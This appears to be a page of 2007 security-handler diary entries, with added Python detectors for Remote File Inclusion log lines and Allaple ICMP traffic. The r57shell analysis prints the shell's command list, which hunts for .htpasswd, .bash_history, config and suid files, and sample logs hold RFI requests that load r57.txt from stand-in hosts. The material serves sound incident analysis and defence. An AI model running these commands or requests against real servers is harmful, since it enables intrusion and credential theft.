In the past few days a new vulnerability was discussed publicly: a Cross Site Scripting (XSS) vulnerability against a local resource in MSIE 7 on at least Windows XP and Vista.

The vulnerability is in a local page displaying a "Navigation to the webpage was canceled" message with a "Refresh the page" link. An attacker can send a browser following a crafted link to this local resource, making it display a faked address in the address bar and using scripting to make the "Refresh the page" link go to a page of his/her choice.
Do not confuse the "Refresh the page" link with the refresh button on the browser.

This might be useful in a phishing attack, but it does sound rather complex and requires the user to jump through hoops.

CVE-2007-1499 (NIST's version), Mitre's version should get updated at their next update of the website.

I've also updated the "missing Microsoft patches" table, so we'll track it.

Swa Frantzen -- NET2S


Published: 2007-03-17

Remote File Inclusion Attempts

The Report:

Chris wrote in this morning reporting: "a group from Turkey who have been trying really hard to inject this PHP exploit into my web site."
From the log snippet supplied it appears on the surface to be a Remote File Inclusion attempt. PHP applications vulnerable to such attacks allow an attacker to execute their own code on the web server with a simple crafted request.

More information about Remote File Inclusion can be found:

The attackers attempted to include code from alganx.by.ru called r57.txt.
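The Morfeus hits in the earlier entry and the r57.txt inclusion attempt here leave the same kind of trace in an access log, so one added script (not the diary author's code) covers both: it parses Apache combined-format lines, tags scanner user agents and include parameters that carry a URL or are probed empty, and reports distinct source addresses the way the grep | cut | sort | uniq pipeline in the Morfeus entry did. The log lines are constructed; example.invalid stands in for the hosting site.

```python
"""Triage Apache combined-format access logs for PHP vulnerability scanners
and Remote File Inclusion (RFI) attempts.

Added example, not part of the original diary entries. The sample log lines
are constructed: the two Morfeus requests copy the paths quoted in the diary,
the RFI requests use example.invalid in place of the real hosting site.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache LogFormat "combined":
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent substrings of known noisy scanners (only the one from the diary).
SCANNER_UA_MARKERS = ("morfeus",)

# A parameter whose value is itself a URL is the signature of an RFI attempt:
# the request asks a vulnerable include() to fetch and run remote code.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Parameter names that typically feed include()/require() in PHP applications;
# a scanner probes them with an empty value first, as Morfeus does.
INCLUDE_PARAM_RE = re.compile(r"path|dir|root|include|file", re.IGNORECASE)

SAMPLE_LOG = """\
198.51.100.7 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
198.51.100.7 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
203.0.113.9 - - [17/Mar/2007:09:01:12 -0400] "GET /index.php?page=http://example.invalid/r57.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.9 - - [17/Mar/2007:09:01:13 -0400] "GET /modules/mod.php?inc=http://example.invalid/r57.txt HTTP/1.1" 404 1042 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.44 - - [21/Mar/2007:02:30:00 -0400] "GET /about.html HTTP/1.1" 200 2311 "-" "Mozilla/5.0 (X11; Linux) Firefox/2.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(entry):
    """Decoded (name, value) pairs of the request's query string, blanks kept."""
    return parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True)


def classify(entry):
    """Tag one request: scanner-ua, rfi-attempt and/or include-probe."""
    tags = set()
    ua = entry["ua"].lower()
    if any(marker in ua for marker in SCANNER_UA_MARKERS):
        tags.add("scanner-ua")
    for name, value in query_params(entry):
        if REMOTE_URL_RE.match(value):
            tags.add("rfi-attempt")
        elif value == "" and INCLUDE_PARAM_RE.search(name):
            tags.add("include-probe")
    return tags


def remote_include_hosts(entry):
    """Hosts the request tried to pull code from."""
    hosts = []
    for _, value in query_params(entry):
        if REMOTE_URL_RE.match(value):
            host = urlsplit(value).hostname
            if host:
                hosts.append(host.lower())
    return hosts


def summarize(log_text):
    """Per tag: request count and distinct sources, plus a tally of hosts
    serving included code. This is the grep | cut | sort | uniq pipeline,
    with the classification made explicit."""
    sources = defaultdict(list)
    hosts = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        for tag in tags:
            sources[tag].append(entry["ip"])
        if "rfi-attempt" in tags:
            hosts.update(remote_include_hosts(entry))
    report = {tag: {"requests": len(ips), "sources": sorted(set(ips))}
              for tag, ips in sources.items()}
    report["remote_include_hosts"] = dict(hosts)
    return report


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```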

Passive Investigation:

We begin with low-impact analysis: a few digs, whois lookups, etc.

alganx.by.ru. 9h14m49s IN A

by.ru. 9h14m49s IN NS ns2.by.ru.
by.ru. 9h14m49s IN NS ns3.by.ru.
by.ru. 9h14m49s IN NS ns1.by.ru.

ns2.by.ru. 9h14m49s IN A
ns3.by.ru. 9h14m49s IN A
ns1.by.ru. 9h14m49s IN A

Maxmind's GeoIP places the IPs in Moscow.  Let's see if RIPE.NET agrees...

% Information related to ' -'

inetnum: -
netname: EVERNET
descr: Free web hosting
country: RU
admin-c: amg28-ripe
tech-c: amg28-ripe
status: ASSIGNED PA "status:" definitions
source: RIPE # Filtered

person: Aleksei M Golubev
address: Moscow, Russia
e-mail: noc@ever.ru
remarks: phone: +7 095 7712007
phone: +7 495 7712007
remarks: fax-no: +7 095 7712007
fax-no: +7 495 7712007
nic-hdl: AMG28-RIPE
source: RIPE # Filtered
remarks: modified for Russian phone area changes

And also:

% Information related to ' -'

inetnum: -
descr: Sky-Media Ltd. network
remarks: You aren't right!
country: RU
admin-c: SKYM-RIPE
tech-c: SKYM-RIPE
status: ASSIGNED PA "status:" definitions
source: RIPE # Filtered

address: Sky-Media Network Operation Center
address: 9, Sushevsky Val
address: 127018 Moscow Russia
phone: +7 495 9816042
abuse-mailbox: abuse@skyme.ru
admin-c: DD5555-RIPE
admin-c: PS5555-RIPE
admin-c: SO796-RIPE
tech-c: PS5555-RIPE
tech-c: SKYM-RIPE
nic-hdl: SKYM-RIPE
source: RIPE # Filtered

This leaves me with a couple of e-mail addresses I can try for getting the file removed.

We continue the passive investigation with a bit of googling around. With the recent malicious JavaScript incidents that I've been working on, you can get a gauge of the extent of the distribution of the malicious links. This is different, since in RFI you'll see the code in the access logs, not as live links littered through people's blogs. In today's incident we turn up that r57.txt has been around for quite a while. One can find this being discussed as far back as 2004-- well, one can find discussions about r57.txt, the file name, appearing in people's access logs.

Grabbing the File

The next step is to grab a copy of r57.txt to see what it does. Using wget it is straightforward in this case. I clamscan it out of habit and it scans cleanly. Through visual inspection I can tell that this is a copy of the r57shell-- because it says so in the header. Fear my reverse engineering skillz.

So What Does this Actually Do?

Let's assume that this actually worked.  How bad of a day is Chris going to have?

From simply looking at the code, I would venture to say that a compromise like this is very bad.  It allows the attacker near-shell access.  Depending on the permissions that PHP is running under, this could lead to a total compromise of the system.

It supports both Russian and English languages.  It will talk to MySQL, Postgres, or Oracle databases. 

The multi-language support exposes a lot of the code's features; from the English support definitions:

/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text21'=>' New name',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text77'=>'Show database structure',
'eng_text78'=>'show tables',
'eng_text79'=>'show columns',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',

Some of the examinations it performs on the system (also straight from the code):

'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',

You can see it's looking for vulnerable points in the system (suid files with potential vulnerabilities of their own, writable directories to use, etc.).  It also grabs passwords and hashes for offline attacks.

It has shellcode to allow the attacker to run a bindshell on the compromised server, or to open up a reverse shell to an attacker's system.

It reports system monitoring statistics, so you don't place too much load on a system with your antics.  It helps the attacker determine what tools (wget, fetch, lynx, links, curl, etc.) are on the system to pull down additional tools/files.

So even if we assume that PHP isn't running as uid 0 already, the attacker is able to investigate the filesystem on the server, and likely upload and execute any code they wish.  Which means that root access isn't far off.

This would end up being a very bad day for anyone to have this happen to their system.

Vulnerable Systems

Remote File Inclusion is a sub-set of Input Validation Attacks.  It is a (sadly) fairly common vulnerability.  Not many weeks go by without an announced RFI in some PHP application or other.  There are over 800 examples in Secunia's vulnerability database.  register_globals is a big entry point for these, and it's common hardening advice to disable it.
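As noted above, RFI probes show up in the web server's access log rather than as links in blogs: the vulnerable parameter carries a full URL to the attacker's copy of the shell.  The scanner below is an added example (not code from the diary) that pulls such requests out of Apache/nginx combined-format log lines.  The log lines, client addresses and the remote host are constructed; the only file name it knows is r57.txt, from the diary.

```python
"""Flag likely Remote File Inclusion probes in a web server access log.

Added example, not code from the diary. It assumes the Apache/nginx
"combined" or "common" log format; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# client, ident, user, [timestamp], "METHOD target protocol", status, bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# An RFI probe hands the vulnerable include() a full URL instead of a file name.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Shell file names from the diary; extend with what you see in your own logs.
KNOWN_SHELL_FILES = ("r57.txt",)


def classify_remote_url(url):
    """Say why a parameter value that is a URL looks like an RFI payload."""
    path = urlsplit(url).path.lower()
    if path.endswith(KNOWN_SHELL_FILES):
        return "known r57shell file name"
    if path.endswith(".txt"):
        # Shells are hosted as .txt so the attacker's server returns the raw PHP
        return "remote .txt payload (raw PHP source)"
    return "remote URL in parameter"


def find_rfi_attempts(log_lines):
    """Return one dict per suspicious (line, parameter) pair, in log order."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so encoded URLs are caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value):
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "param": name,
                    "remote": value,
                    "status": int(m.group("status")),
                    "reason": classify_remote_url(value),
                })
    return hits


def hits_by_client(hits):
    """Count suspicious requests per client address, most active first."""
    counts = {}
    for hit in hits:
        counts[hit["client"]] = counts.get(hit["client"], 0) + 1
    return sorted(counts.items(), key=lambda item: (-item[1], item[0]))


# Constructed sample log: one clean request, two RFI probes, one URL in a search box.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Mar/2007:10:15:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123
192.0.2.55 - - [28/Mar/2007:10:15:07 +0000] "GET /index.php?page=http://203.0.113.7/r57.txt? HTTP/1.1" 200 8891
192.0.2.55 - - [28/Mar/2007:10:15:09 +0000] "GET /admin/inc/header.php?path=http://203.0.113.7/tools/cmd.txt HTTP/1.1" 404 312
198.51.100.3 - - [28/Mar/2007:10:16:44 +0000] "GET /search.php?q=http%3A%2F%2Fexample.org%2F HTTP/1.1" 200 2210
"""

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["client"], hit["param"], "->", hit["remote"], "|", hit["reason"])
    print(hits_by_client(find_rfi_attempts(SAMPLE_LOG.splitlines())))
```

The third reason, "remote URL in parameter", is deliberately low confidence: a search form that receives a URL looks the same in the log, so the status code and the target script are what tell a successful include (200 on a page that should never fetch remote content) from noise.  A 404 still matters, since it shows the probe hit a path that does not exist on this host but the client is enumerating known vulnerable applications.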

Quick fix from fellow-handler Swa:

"In the php.ini:

register_globals = On
register_globals = Off
(or add the latter)

While at it, change:
allow_url_fopen = On
allow_url_fopen = Off
This latter disables remote includes

You'll likely need to restart the webserver after this for the updates to
take effect."

Previous Incidents

r57shell was mentioned in an earlier diary.



Published: 2007-03-16

Ongoing interest in Javascript issues

    A number of today's posts to the handler's list were related to Swa Frantzen's "Javascript hiding everywhere" post.  The fact that javascript can be used, as he mentioned, to capture keystrokes or upload files should be cause for concern and reason to disable javascript whenever possible.
    I too have used the Noscript extension with firefox for a long time.  It allows me to enable javascript for the few trusted web sites that need it and disable it by default for all other sites.  Recommended.
    A few web sites try to force viewers to enable javascript by making their home page something like:
[script language="JavaScript"]
window.location.href = "index.php";
    By simply looking at the source for the home page, one can figure out that index.php is where the web site lies, and sure enough, the remainder of the web site comes up just fine without javascript.
    -- Bill, http://www.stearns.org/


Published: 2007-03-15

Javascript hiding everywhere.

Frequent readers will know that we often recommend to ease up on allowing scripting as it's used by the bad guys. XSS bugs are basically so bad, not for the example <sc ript>alert('XSS')</sc ript> (spaces added for the overly paranoid web content filters) you might see, but for much nastier things starting with capturing your cookies (read credentials, session keys etc.). Keyloggers aren't impossible either and making you unknowingly upload files  from your hard disk to malicious websites etc. is all quite possible in javascript.

And if you supposed it stops in your browser seeing javascript in HTML pages themselves, think again:


Apple software designers/coders must have thought it a cool idea to allow javascript inside a QuickTime movie. Yep, a movie isn't just some moving images; it can just as well contain (malicious) code that will be executed by the movie viewer that gets embedded in the pages you show. Didier Stevens has a blog entry about it, explaining it in detail.


If you use flash, you already have cookies not just in your browser, but also in your flash player. You can see the settings for the flash player's use of such storage here: http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager02.html . Do take care fiddling with your settings; you can easily make flash stop working all that well if you do it a bit too much (speaking from experience here). That settings pane/web page doesn't seem to mention to the casual user that flash also supports javascript, nor that it has already been hit by XSS issues in the past: e.g. this August 2002 article is about one such problem.


Unfortunately PDF files aren't safe from allowing javascript and have had their share of problems with it as well.


Contains just music, right? Well, many of them are copyright lawsuits waiting to happen if you believe the music industry, but yep, they too can contain scripting. Granted, you might need QuickTime installed to get to it, but most iPod owners will have iTunes and that comes with QuickTime bundled into it ...


Unfortunately there are many more formats that allow remote code execution by allowing scripting or extensive macro languages.

If there's a lesson to be learned, it might well be that you need to continue to look out for scripting languages, cookies and more even hidden in places you might not expect them to creep into.

If you have good workable solutions to prevent scripting in all these media rich formats, let us know.

Swa Frantzen -- NET2S


Published: 2007-03-14

MS Windows 2003 SP2

Looking deeper into the security aspects of Windows 2003 SP2, we received a list of known CVEs that are supposed to be fixed in SP2 for Windows 2003:

CVE name       Affected                 Reference
CVE-2006-5578  MSIE 6                   MS06-072
CVE-2006-3443  Winlogon                 MS06-051
CVE-2006-3281  MSIE 6                   MS06-045
CVE-2006-2385  MSIE                     MS06-021
CVE-2006-2379  TCP/IP stack             MS06-032
CVE-2006-2375  ?                        ?
CVE-2006-2218  MSIE 6                   MS06-021
CVE-2006-1388  MSIE 6                   MS06-013
CVE-2006-1315  Server Service           MS06-035
CVE-2006-1313  Microsoft JScript        MS06-023
CVE-2006-1192  MSIE                     MS06-013
CVE-2006-0026  IIS                      MS06-034
CVE-2006-0021  TCP/IP stack             MS06-007
CVE-2006-0006  Media player             MS06-005
CVE-2005-4089  MSIE                     MS06-021
CVE-2005-3240  MSIE race condition      MSRC blog
CVE-2005-2388  USB driver               ?
CAN-2006-1626  MSIE                     MS06-021
CAN-2005-2129  ?                        ?
CAN-2005-2123  WMF                      MS05-053
CAN-2005-0944  Jet DB                   CERT vuln id 176380
CAN-2005-0803  EMF                      MS05-053
CAN-2005-0109  Hyperthreading support   CERT vuln id 911878
CAN-2004-1331  MSIE                     CERT vuln id 743974
CAN-2004-1173  MSIE                     ?
CAN-2004-1060  TCP/IP stack             MS05-019

There are a number of interesting things in here for sure.

Swa Frantzen -- NET2S


Published: 2007-03-14

Allaple worm

This comes from one of our friends over at the Finnish CERT team, CERT-FI / FICORA.

"CERT-FI has been tracking the situation with the Allaple worm
for about 8 months now. We have traced the evolution of the
worm since the first variants came out.

Allaple is a polymorphic worm. The first variants spread through
Radmin installations that had weak passwords.
Every variant so far also tries to locate
all html files on the harddisk to prepend an <object> -tag
into the file to ensure activation of the worm when a local
webmaster views the files. Traces of this behaviour can be
seen on some websites: There's an <object> tag right below the
<html> tag in the page, with the source pointing to a random

The first variants were DDOSsing only 1 target and the DDOS was a basic
SYN flood. Shortly thereafter another target was added to the DDOS routine in the

A bit after that the spreading mechanisms were changed from
Radmin scans to basic catering of Windows exploits,
and yet another target or victim was added.

The SYN DDOS routine has been the same from the first variant
to the latest variant available. Early in the winter code was
added to do HTTP GETs on the target websites. A few other ports
were also targeted. One site is currently getting gentle packet
love on tcp ports 22,80 and 97. Another site is getting packets and
HTTP gets on port 80, and yet another is getting packets on
ports 80 and 443.

The worms have absolutely no Command and Control channels in them.
Once released, there is no way to make them disappear. Their sole
purpose is to spread and DDOS.

In case you are in the correct position, and you feel you would
want to help in this pesky problem, here are a few tricks you can
use to identify Allaple variants on the loose in your networks:

1) ICMP packets with the string "Babcdefghijklmnopqrstuvwabcdefghi",
sans quotes, in the payload.
2) Echo requests to entire networks including host octets of 255 and 0.

We have reason to believe that there will be more variants,
it's just a matter of time when a new one pops out into the open.

CERT-FI is interested in any information or observations regarding the DDOS
or the malware itself. We can be contacted at cert(at)ficora.fi"
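CERT-FI's two indicators above (the fixed marker string in the ICMP payload, and echo requests sent to addresses whose host octet is 0 or 255) are easy to check for mechanically.  The code below is an added example, not part of CERT-FI's note or the diary: it takes IPv4 packets as raw bytes (however you capture them) and reports which of the two indicators each one matches.  The sample packets are constructed with a small builder, and the host-part size defaults to 8 bits to match CERT-FI's "host octet" wording.

```python
"""Spot the two Allaple indicators CERT-FI lists, in raw IPv4/ICMP packets.

Added example, not part of CERT-FI's note or the diary. It takes packets as
raw bytes (e.g. from a pcap reader); how you capture them is outside its scope.
"""
import ipaddress
import struct

# Marker string quoted by CERT-FI; Allaple puts it in the ICMP payload.
ALLAPLE_MARKER = b"Babcdefghijklmnopqrstuvwabcdefghi"

IP_HEADER = "!BBHHHBBH4s4s"   # ver/IHL, TOS, total len, id, flags/frag, TTL, proto, csum, src, dst
ICMP_HEADER = "!BBHHH"         # type, code, checksum, identifier, sequence
PROTO_ICMP = 1
ICMP_ECHO_REQUEST = 8


def build_icmp_echo(src, dst, payload, ident=0x1234, seq=1):
    """Constructed IPv4 echo-request packet for testing (checksums left zero)."""
    icmp = struct.pack(ICMP_HEADER, ICMP_ECHO_REQUEST, 0, 0, ident, seq) + payload
    ip = struct.pack(IP_HEADER, 0x45, 0, 20 + len(icmp), 0, 0, 64, PROTO_ICMP, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + icmp


def inspect_ipv4_packet(raw, host_bits=8):
    """Return the Allaple indicators found in one raw IPv4 packet.

    host_bits: size of the host part used for the network/broadcast check;
    CERT-FI's wording ("host octets of 255 and 0") is the /24 default.
    """
    if len(raw) < 20:
        return []
    ver_ihl, _, total_len, _, _, _, proto, _, _src, dst = struct.unpack(IP_HEADER, raw[:20])
    if ver_ihl >> 4 != 4 or proto != PROTO_ICMP:
        return []
    ihl = (ver_ihl & 0x0F) * 4
    icmp = raw[ihl:total_len]
    if len(icmp) < 8:
        return []
    icmp_type = icmp[0]
    payload = icmp[8:]

    findings = []
    if ALLAPLE_MARKER in payload:
        findings.append("allaple-marker-payload")
    host_mask = (1 << host_bits) - 1
    host_part = int(ipaddress.IPv4Address(dst)) & host_mask
    if icmp_type == ICMP_ECHO_REQUEST and host_part in (0, host_mask):
        findings.append("echo-request-to-network-or-broadcast")
    return findings


def scan_packets(packets, host_bits=8):
    """Map packet index -> indicators, for packets that match at least one."""
    report = {}
    for index, pkt in enumerate(packets):
        found = inspect_ipv4_packet(pkt, host_bits)
        if found:
            report[index] = found
    return report


# Constructed sample traffic: a normal ping, a worm-style sweep packet, a probe to a .0 address.
SAMPLE_PACKETS = [
    build_icmp_echo("192.0.2.10", "192.0.2.20", b"ordinary ping payload"),
    build_icmp_echo("192.0.2.77", "198.51.100.255", b"\x00\x00" + ALLAPLE_MARKER),
    build_icmp_echo("192.0.2.77", "198.51.100.0", b"abcdefgh"),
]

if __name__ == "__main__":
    for index, found in scan_packets(SAMPLE_PACKETS).items():
        print(index, found)
```

The marker check is the strong indicator; the network/broadcast check on its own also catches legitimate broadcast pings and subnets that are not /24, so pass the right host_bits for your address plan and treat a lone "echo-request-to-network-or-broadcast" as a lead to correlate with the source host, not a verdict.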


Published: 2007-03-14

Mac OS X patches

Well, looks like this month we get more Apple fixes than Windows patches for a change. Mac OS X 10.4.9 is out, and according to US-CERT, this is an upgrade that plugs "arbitrary code execution and SYSTEM level access" type vulnerabilities. Sounds like a fix even Apple fanboys with lots of faith in the unbreakable nature of their system should consider applying real soon. The same fix covering only the security portion but leaving out the functionality upgrade is also available as Security Update 2007-003, and installs on 10.3.9. More information on both can be found on the Apple Docpage.


Published: 2007-03-14

The end of the trend

I used to be an avid reader of the port statistics of my firewalls, because I can remember a time when they actually told me something. Lately though - it must have started in the second half of 2006 - I've come to the conclusion that the daily stroll through the firewall stats isn't worth much of my time anymore. Purists always considered "enumerating badness" one of the dumber things to spend your time on, but the fact is that statistical analysis of firewall drop logs did in the past successfully act as an early warning system for new nasties. My guess (and your opinion is of course entitled to differ) is that these days are past. Looking at my firewall stats, I see lots of things making their way to the top of the trend radar and blinking at me in scary red. Investigation turns up that it is - who knows what, some botnet gone wild, some kid boldly scanning the port no kid has scanned before. For the past months, the things on top were invariably neither a trend nor a new attack, simply a random escape of the Internet's intestinal gas.

What really made me think though was the conspicuous absence of telnet scans when the Sun snafu came to light a few days back. My stats, while covering lots of IP space, didn't show the scary bright red upswing of tcp/23 badness that - I admit - I was almost gleefully waiting for. Careful manual inspection then showed that - oh! - the telnet probing did happen at my perimeter, but it was well below the level of all that noise that makes it to the top of the "trend" radar. On one day, when a single IP address from South Africa slowly probed a good portion of my IP space for telnet, we also got slammed by a 2000-nodes-in-parallel scan for tcp/17458. And. And. Enough to make the telnet thingy rank at position 84, way below my attention span.

As a couple folks who are more savvy at inspecting network traffic than I am have suggested, trending and comparing the in/out flows on ports that are permitted through the firewalls is of much more value than converting the hits on dropped ports into colorful statistics. They are right - but, alas, as most commercial firewall log analysis tools show, enumerating badness is so much easier to do...


Published: 2007-03-14

OpenBSD IPv6 remote vulnerability

OpenBSD 3.9 and 4.0 have released a fix for a problem in the IPv6 stack.

Source code patches are available at:
As a workaround, if you do not need IPv6, you can use the following (it will block all IPv6):

# vi /etc/pf.conf
    (add the line:  block drop in inet6 all)
# pfctl -f /etc/pf.conf
    (load the new rules into the pf packet filter)
# pfctl -s rules
    (check that the rule shows up in the runtime rules)
The workaround does disable all incoming IPv6 packets on the machine.

The patch itself is a kernel patch, so you will need to recompile a kernel, install it and reboot the affected machines.

Swa Frantzen -- NET2S


Published: 2007-03-13

Good malware reversing article from Websense

Here is a good article from the Websense labs folks.  Apparently, a large bank in Norway has been fighting a massive infection of this malware.  The binary uses multiple layers of advanced techniques to hinder reversing.  If you want a peek inside some malware authors' tricks (if properly motivated and educated), then this is a good article to read.


Published: 2007-03-13

DST Wrapup

At the risk of continuing a dead story, we are still getting reports of DST issues and annoyances. I can summarize most of it by saying that people are still having problems and having to resort to strange solutions. I'm expecting that this is going to continue for weeks and for some vendors that didn't get it right this time, I expect the same problem next year.

Without trying to downplay the issues that people are seeing with their server/workstation clocks being off, we haven't heard any really bad stories of SCADA system failures, medical equipment failures, avionics failures, etc. I am curious to know if this affected any "mission critical" systems that support basic life. I am guessing that we will be reading about them soon in the RISKS newsletter (catless.ncl.ac.uk/Risks).


Published: 2007-03-13

Release candidate for Windows Server 2003 SP2

Usually, I wouldn't consider this news, but people are watching Microsoft closely today just to make sure that they don't slip up and release something prematurely (and we've received several emails about it).  Microsoft published a release candidate for Server 2003 SP2 today.  Apparently, it has been loaded into Windows Update already.  So if your server admins are feeling neglected, send them this: www.microsoft.com/technet/windowsserver/sp2.mspx


Published: 2007-03-12

MS DST Patch issue(?)

It appears that there is a problem with the MS DST patch.  One of our readers, Ray, notified us about a problem with the MS DST patch (931836).
More information about this patch problem can be found here.  If you have a similar problem, please let us know.
At this moment, we haven't heard from MS yet. If we get more information, we will update this.

Update :  There is another fix available: Windows-based applications that use the TZ environment variable may not work as expected because of the changes to DST. More information is available at the following link (http://support.microsoft.com/kb/932590/en-us)

Update : Our reader, Alan, notified us of the MS Mobile update for the DST patch; the patch is available here.


Published: 2007-03-11

Yahoo mail problems

We've received e-mail from several readers (and seen ourselves) that Yahoo mail seems to be experiencing some problems.  At this point, we don't know whether or not it is related to the DST changes, but today expect just about everything to be blamed on it.  We'll update the story if we get any real details.


Published: 2007-03-11

GoDaddy is Experiencing Technical Difficulties

We were notified by one of our readers that his web sites were not resolving correctly.  It appears that Go Daddy is experiencing some difficulties and has posted a notice to that effect on their support website.  If you have problems accessing websites today it could be that they are hosted on GoDaddy.  GoDaddy is not giving any information as to the cause of the problems or an ETA for their resolution.


Thanks to Neal for notifying us.

Update :   The following news article gives more information about GoDaddy's DST issue.

Update :  According to GoDaddy, they suffered a DDoS attack and the outage is not related to the DST issue.


Published: 2007-03-11

Sun Alert Notification Dated March 10th, 2007

Some of you may have missed the following Alert Bulletin posted by Sun Microsystems yesterday.  It deals with the change in DST and "Olson time zone data tzdata2005r or greater incompatibility". According to the information available from Sun regarding this alert sunsolve.sun.com/search/document.do there is a problem with Eastern, Hawaii and Mountain Time Zones and Sun Java 2 software.

It appears that there are 2 issues that affect the ability for the software to calculate correctly.  Both of the issues are covered by bug reports from Sun.

Sun bug 6466476

